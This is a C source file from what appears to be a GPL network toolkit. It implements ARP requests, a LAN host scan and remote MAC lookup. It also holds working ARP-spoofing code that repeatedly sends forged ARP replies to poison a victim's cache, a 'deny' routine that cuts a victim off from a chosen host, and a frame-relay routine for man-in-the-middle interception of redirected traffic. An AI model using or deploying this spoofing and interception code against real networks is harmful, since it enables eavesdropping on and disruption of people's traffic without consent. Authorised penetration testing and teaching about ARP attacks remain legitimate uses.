/* -*- Mode:C; c-file-style:"gnu"; indent-tabs-mode:nil; -*- */
/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 3 as
 * published by the Free Software Foundation;
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 * Author: Marco Guastella <vasta@ragnu.it>
 */
 
 #include "../core.h"
 
/*internal*/

l_str l_arp_request(const l_str dev,const l_str maclocal,struct addrinfo *ipsrc,struct addrinfo *ipdst,l_out out)
{
	l_str filter=l_str_new();
	l_str host=l_str_new();
	l_str port =l_str_new();
	l_str ret=l_str_new();
	l_str sip=l_str_new();
	l_str dip=l_str_new();
	l_index p=0;
	l_raw sraw=0;
	l_harp4 arp4=l_harp4_new();
	l_hmac3 mac3=l_hmac3_new();
	if(maclocal == 0 || !l_mac_is(maclocal))
		l_out_err(out,"l_arp_request:maclocal not bad format");
	else
	{
		l_ip_getaddrinfo(ipdst,&host,&port,out);
		if(! l_out_iserr(out))
		{	
			l_str_write(&filter,"arp and src host %s",host);
			if((sraw=l_sock_rawopen(dev,filter,out)) != 0)
			{
				l_buf_reset(sraw->bsend_);
				switch(l_dev_type(dev,out))
				{
					case LETH:  	l_hmac3_set("FF:FF:FF:FF:FF:FF",maclocal,ARP4,mac3,out);
								if(l_out_iserr(out))
									break;
								p=l_hmac3_write(mac3,sraw->bsend_,p,out);
								if(l_out_iserr(out))
									break;
								if(ipsrc->ai_family == AF_INET && ipdst->ai_family == AF_INET)
								{
									if(! l_ip_4tostr(ipsrc,&sip) || ! l_ip_4tostr(ipdst,&dip))
										l_out_err(out,"l_arp_request:ip address not bad format");
									l_harp4_set(ETH,IPV4,REQUEST,maclocal,sip,"00:00:00:00:00:00",dip,arp4,out);
									if(l_out_iserr(out))
										break;
									l_harp4_write(arp4,sraw->bsend_,p,out);
									if(l_out_iserr(out))
										break;
									l_sock_rawsend(sraw,out);	
									if(l_sock_rawrecv(sraw,out) != 0)
									{	
										l_harp4_read(sraw->brecv_,14,arp4,out);
										if(l_out_iserr(out))
											break;
										l_str_cpy(&ret,arp4->smac_);
									}	
								}
								else if(ipsrc->ai_family == AF_INET6 && ipsrc->ai_family == AF_INET6)
								{
									l_out_err(out,"l_arp_request:ipv6 not implemented");
								}
								else
									l_out_err(out,"l_arp_request:ip address incompatible type");	
						   
								break;
					case NOTYPE:  l_out_err(out,"l_arp_request:no device type valid");
								break;			
					default:		l_out_err(out,"l_arp_request:no device type implemented");
								break;			
				}
			}		
		}
	}		
	l_sock_rawclose(&sraw);
	l_harp4_free(&arp4);
	l_hmac3_free(&mac3);
	l_str_free(&host);
	l_str_free(&port);	
	l_str_free(&filter);
	l_str_free(&sip);
	l_str_free(&dip);
	return ret;
}

/*end internal*/

/*external*/

void l_arp_scanlan(const l_str dev,const l_str ipsrc,const l_str netmask,const l_str maclocal,l_bool pvideo,l_out out)
{
	l_num nhost;
	struct addrinfo *subnet=0,*sip=0;
	l_out out2=l_out_new();
	l_str host=l_str_new();
	l_str port=l_str_new();
	l_str ipsrc2=l_str_new();
	l_str netmask2=l_str_new();
	l_str maclocal2=l_str_new();
	l_str arp;
	if(ipsrc==0)
		ipsrc2= l_dev_sip(dev,out);
	else
		l_str_cpy(&ipsrc2,ipsrc);
	if(netmask==0) 
		netmask2= l_dev_smask(dev,out);
	else
		l_str_cpy(&netmask2,netmask);
	if(maclocal == 0)
		maclocal2= l_dev_shw(dev,out);
	else
		l_str_cpy(&maclocal2,maclocal);
	if(ipsrc2 == 0 || netmask2 == 0 || maclocal2==0);
	else if((sip=l_ip_newaddrinfo(ipsrc2,"0",0,0,out)) != 0 && (subnet=l_ip_getsubnetaddrinfo(ipsrc2,netmask2,&nhost,out)) != 0)
	{
		while(nhost > 0)
		{
			l_ip_incraddrinfo(subnet);
			nhost--;
			arp=l_arp_request(dev,maclocal2,sip,subnet,out);
			if(l_out_iserr(out))
				break;
			l_ip_getaddrinfo(subnet,&host,&port,out2);
			if(arp!=0)
			{	
				l_out_cok(out,"%s => %s",host,arp);
				if(pvideo)
					l_std_out("%s => %s\n",host,arp);
				l_str_free(&arp);
			}
		}			
	}
	l_ip_freeaddrinfo(&subnet);
	l_ip_freeaddrinfo(&sip);
	l_str_free(&host);
	l_str_free(&port);
	l_str_free(&ipsrc2);
	l_str_free(&netmask2);
	l_str_free(&maclocal2);
	l_out_free(&out2);
}

l_str l_arp_getremotemac(const l_str dev,const l_str ipsrc,const l_str ipdst,const l_str maclocal,l_out out)
{
	struct addrinfo *sip=0,*dip=0;
	l_str ipsrc2=l_str_new();
	l_str maclocal2 = l_str_new();
	l_str arp=l_str_new();
	if(ipsrc==0)
		ipsrc2= l_dev_sip(dev,out);
	else
		l_str_cpy(&ipsrc2,ipsrc);
	if(maclocal == 0)
		maclocal2= l_dev_shw(dev,out);
	else
		l_str_cpy(&maclocal2,maclocal);
	if(ipsrc2 == 0 || maclocal2==0);
	else if((sip=l_ip_newaddrinfo(ipsrc2,"0",0,0,out)) != 0 && (dip=l_ip_newaddrinfo(ipdst,"0",0,0,out)) != 0)
		arp=l_arp_request(dev,maclocal2,sip,dip,out);
	l_ip_freeaddrinfo(&sip);
	l_ip_freeaddrinfo(&dip);
	l_str_free(&ipsrc2);
	l_str_free(&maclocal2);
	return arp;
}

void l_arp_getremotemac2(const l_str dev,const l_str ipsrc,const l_str ipdst,const l_str maclocal,l_out out)
{
	l_str arp;
	arp=l_arp_getremotemac(dev,ipsrc,ipdst,maclocal,out);
	if(arp != 0)
	{
		l_out_cok(out,"%s => %s",ipdst,arp);
		l_str_free(&arp);
	}
	else if(arp==0 && ! l_out_iserr(out))
		l_out_cok(out,"%s => not found",ipdst);
}

l_bool l_arp_macdouble(const l_str dev,const l_str ip1,const l_str ip2,l_str *mac1,l_str *mac2,l_out out)
{
	l_str msp;
	l_str_free(mac1);
	l_str_free(mac2);
	if(l_ip_4isstr(ip1) && l_ip_4isstr(ip2))
	{
		(*mac1)=l_arp_getremotemac(dev,"1.1.1.1",ip1,"00:00:00:00:00:00",out);
		(*mac2)=l_arp_getremotemac(dev,"1.1.1.1",ip2,"00:00:00:00:00:00",out);
		if((*mac1) == 0 || (*mac2) == 0)
		{	
			msp=l_dev_shw(dev,out);
			if(!l_out_iserr(out))
			{	
				if((*mac1)==0)
					(*mac1)=l_arp_getremotemac(dev,"1.1.1.1",ip1,msp,out);
				if((*mac2)==0)
					(*mac2)=l_arp_getremotemac(dev,"1.1.1.1",ip2,msp,out);
				l_str_free(&msp);
			}
		}	
	}
	else if(l_ip_6isstr(ip1) && l_ip_6isstr(ip2))
	{
		(*mac1)=l_arp_getremotemac(dev,"::11:11",ip1,"00:00:00:00:00:00",out);
		(*mac2)=l_arp_getremotemac(dev,"::11:11",ip2,"00:00:00:00:00:00",out);
		if((*mac1) == 0 || (*mac2) == 0)
		{	
			msp=l_dev_shw(dev,out);
			if(!l_out_iserr(out))
			{
				if((*mac1)==0)
					(*mac1)=l_arp_getremotemac(dev,"::11:11",ip1,msp,out);
				if((*mac2)==0)
					(*mac2)=l_arp_getremotemac(dev,"::11:11",ip2,msp,out);
				l_str_free(&msp);
			}
		}
	}
	else if((l_ip_4isstr(ip1) && l_ip_6isstr(ip2)) || (l_ip_6isstr(ip1) && l_ip_4isstr(ip2))) 
		l_out_err(out,"l_arp_macdouble:ip address %s - %s incompatible type",ip1,ip2);
	else
		l_out_err(out,"l_arp_macdouble:ip address not valid(%s - %s)", ip1,ip2);	
	if((*mac1) != 0 && (*mac2)!=0)
		return TRUE;
	l_str_free(mac1);
	l_str_free(mac2);
	return FALSE;
}

/*arpspoof group*/

void *l_arp_spoof_init(const l_str dev,const l_str ipvict,const l_str ipspoof,const l_str macspoof)
{
	l_arpspoof aspoof=(l_arpspoof)l_mem_malloc0(sizeof(struct arpspoof));
	l_out out=l_out_new();
	aspoof->out_=l_out_new();
	aspoof->sraw_=0;
	l_str msp=l_str_new();
	l_harp4 arp4=l_harp4_new();
	l_hmac3 mac3=l_hmac3_new();
	l_index p=0;
	if(macspoof == 0)
		msp=l_dev_shw(dev,aspoof->out_);
	else
		l_str_cpy(&msp,macspoof);
	if(msp == 0 || !l_mac_is(msp))
		l_out_err(aspoof->out_,"l_arp_spoof:maclocal not bad format");
	
	else if((aspoof->sraw_=l_sock_rawopen(dev,0,aspoof->out_)) != 0)
	{
		l_buf_reset(aspoof->sraw_->bsend_);
		switch(l_dev_type(dev,aspoof->out_))
		{
			case LETH: 	l_hmac3_set("FF:FF:FF:FF:FF:FF",msp,ARP4,mac3,aspoof->out_);
						if(l_out_iserr(aspoof->out_))
							break;
						p=l_hmac3_write(mac3,aspoof->sraw_->bsend_,p,out);
						if(l_out_iserr(aspoof->out_))
							break;
						if(l_ip_type(ipspoof,out) == AF_INET && l_ip_type(ipvict,out) == AF_INET)
						{	
							l_harp4_set(ETH,IPV4,REQUEST,msp,ipspoof,"00:00:00:00:00:00",ipvict,arp4,aspoof->out_);
							if(l_out_iserr(aspoof->out_))
								break;
							l_harp4_write(arp4,aspoof->sraw_->bsend_,p,aspoof->out_);
							if(l_out_iserr(aspoof->out_))
								break;
						}	
						else if(l_ip_type(ipspoof,out) == AF_INET6 && l_ip_type(ipvict,out) == AF_INET6)
							l_out_err(aspoof->out_,"l_arp_spoof:ipv6 not implemented");
						else
							l_out_err(aspoof->out_,"l_arp_spoof:ip address incompatible type");	
						break;   
			case NOTYPE:  l_out_err(aspoof->out_,"l_arp_spoof:no device type valid");
						break;			
			default:		l_out_err(aspoof->out_,"l_arp_spoof:no device type implemented");
						break;
		}
	}
	l_str_free(&msp);
	l_harp4_free(&arp4);
	l_hmac3_free(&mac3);
	l_out_free(&out);
	return (void *) aspoof;
}

l_bool l_arp_spoof_err(void *data)
{
	l_arpspoof aspoof = (l_arpspoof) data;
	if(l_out_iserr(aspoof->out_))
		return TRUE;
	return FALSE;
}

void *l_arp_spoof_exec(void *data)
{
	l_arpspoof aspoof = (l_arpspoof) data;
	if(l_out_iserr(aspoof->out_))
		return 0;
	l_sock_rawsend(aspoof->sraw_,aspoof->out_);
	if(l_out_iserr(aspoof->out_))
		return 0;
	while(1)
	{
		l_time_sleep(5);
		l_sock_rawsend(aspoof->sraw_,aspoof->out_);
	}		
}

l_out l_arp_spoof_close(void **pdata)
{
	l_out ret;
	l_arpspoof aspoof = (l_arpspoof) (*pdata);
	l_sock_rawclose(&(aspoof->sraw_));
	ret=aspoof->out_;
	l_mem_free(pdata);
	return ret;
}

/*end arpspoof group*/

/*arpdeny section*/

void *l_arp_deny_init(const l_str dev,const l_str ipvict,const l_str ipdeny,l_str macspoof)
{
	l_str arp=l_str_new();
	l_str arp2=l_str_new();
	l_arpdeny adeny=(l_arpdeny)l_mem_malloc0(sizeof(struct arpdeny));
	adeny->out_=l_out_new();
	adeny->spoof_=0;
	l_str carp=0;
	l_arp_macdouble(dev,ipvict,ipdeny,&arp,&arp2,adeny->out_);
	if(!l_out_iserr(adeny->out_))
	{
		if(arp != 0)
		{
			if(arp2 != 0)
			{
				if(macspoof==0)
					carp= l_mac_incrdigit(arp2,8);
				else
					l_str_write(&carp,"%s",macspoof);
				adeny->spoof_=l_arp_spoof_init(dev,ipvict,ipdeny,carp);
				
			}
			else
				l_out_err(adeny->out_,"l_arp_deny:not found host with address %s",ipvict);
		}	
		else
			l_out_err(adeny->out_,"l_arp_deny:not found host with address %s",ipdeny);	
	}
	l_str_free(&arp);	
	l_str_free(&arp2);
	l_str_free(&carp);
	return (void *) adeny;
}

l_bool l_arp_deny_err(void *data)
{
	l_arpdeny adeny=(l_arpdeny) data;
	if(l_out_iserr(adeny->out_) || l_arp_spoof_err(adeny->spoof_))
		return TRUE;
	return FALSE;	
}

void *l_arp_deny_exec(void *data)
{
	l_arpdeny adeny=(l_arpdeny) data;
	if(l_out_iserr(adeny->out_))
		return 0;
	l_arp_spoof_exec((void *) adeny->spoof_);
	return 0;
}

l_out l_arp_deny_close(void **pdata)
{
	l_out ret;
	l_arpdeny adeny=(l_arpdeny)(*pdata);
	if(adeny->spoof_== 0)
		ret=adeny->out_;
	else	
	{	
		l_out_free(&(adeny->out_));
		ret=l_arp_spoof_close((void **) &(adeny->spoof_));
	}
	l_mem_free(pdata);
	return ret;
}

/*end arpdeny section*/

/*arpdirect section*/

void *l_arp_direct_init(const l_str dev,const l_str ipsrc,const l_str ipdst,const l_str maclocal,const l_str filter)
{
	l_str lmac=l_str_new();
	l_str smac=l_str_new();
	l_str dmac=l_str_new();
	l_str f=l_str_new();
	l_arpdirect darp=(l_arpdirect)l_mem_malloc0(sizeof(struct arpdirect));
	darp->out_=l_out_new();
	darp->sraw_=0;
	if(maclocal == 0)
		lmac=l_dev_shw(dev,darp->out_);
	else
		l_str_cpy(&lmac,maclocal);
	if(lmac == 0 || !l_mac_is(lmac))
		l_out_err(darp->out_,"l_arp_direct:maclocal not bad format");
	else if(l_arp_macdouble(dev,ipsrc,ipdst,&smac,&dmac,darp->out_))
	{
		if(filter == 0)
			l_str_write(&f,"not arp and ether src %s and ether dst %s",smac,lmac); 
		else
			l_str_write(&f,"not arp and ether src %s and ether dst %s and (%s)",smac,lmac,filter);
		if((darp->sraw_=l_sock_rawopen(dev,f,darp->out_)) != 0)
		{
			l_buf_reset(darp->sraw_->bsend_);
			switch(l_dev_type(dev,darp->out_))
			{
				case LETH: 	l_mac_strtobuf(dmac,darp->sraw_->bsend_,0);
							l_mac_strtobuf(lmac,darp->sraw_->bsend_,MACADDRLEN);
							darp->point1_=0;
							darp->point2_=MACADDRLEN*2;
							break;
				case NOTYPE:  l_out_err(darp->out_,"l_arpdirect:no device type valid");
							break;			
				default:		l_out_err(darp->out_,"l_arpdirect:no device type implemented");
							break;
			}
		}
	}
	l_str_free(&lmac);
	l_str_free(&smac);
	l_str_free(&dmac);
	return (void *) darp;	
}

l_bool l_arp_direct_err(void *data)
{
	l_arpdirect darp = (l_arpdirect) (data);
	if(l_out_iserr(darp->out_))
		return TRUE;
	return FALSE;
}

void droutine(l_uchar *args, const struct pcap_pkthdr *header,const l_uchar *packet)
{
	l_arpdirect darp = (l_arpdirect)args;
	l_buf_newsize(darp->sraw_->bsend_,header->len);
	l_buf_write(darp->sraw_->bsend_,0,(void *)packet,(darp->point1_));
	l_buf_write(darp->sraw_->bsend_,(darp->point2_),(void *)(packet+darp->point2_),(header->len)-(darp->point2_));
	l_sock_rawsend(darp->sraw_,darp->out_);
}

void *l_arp_direct_exec(void *data)
{
	l_arpdirect darp = (l_arpdirect) (data);
	if(l_out_iserr(darp->out_))
		return 0;
	l_sock_rawroutine(darp->sraw_,droutine,(l_uchar *)data,darp->out_);
	return 0;	
}

l_out l_arp_direct_close(void **pdata)
{
	l_arpdirect darp = (l_arpdirect) (*pdata);
	l_out ret;
	l_sock_rawroutineclose(&(darp->sraw_));
	ret=darp->out_;
	l_mem_free(pdata);
	return ret;
}

/*end arpdirect section*/

/*end extern*/
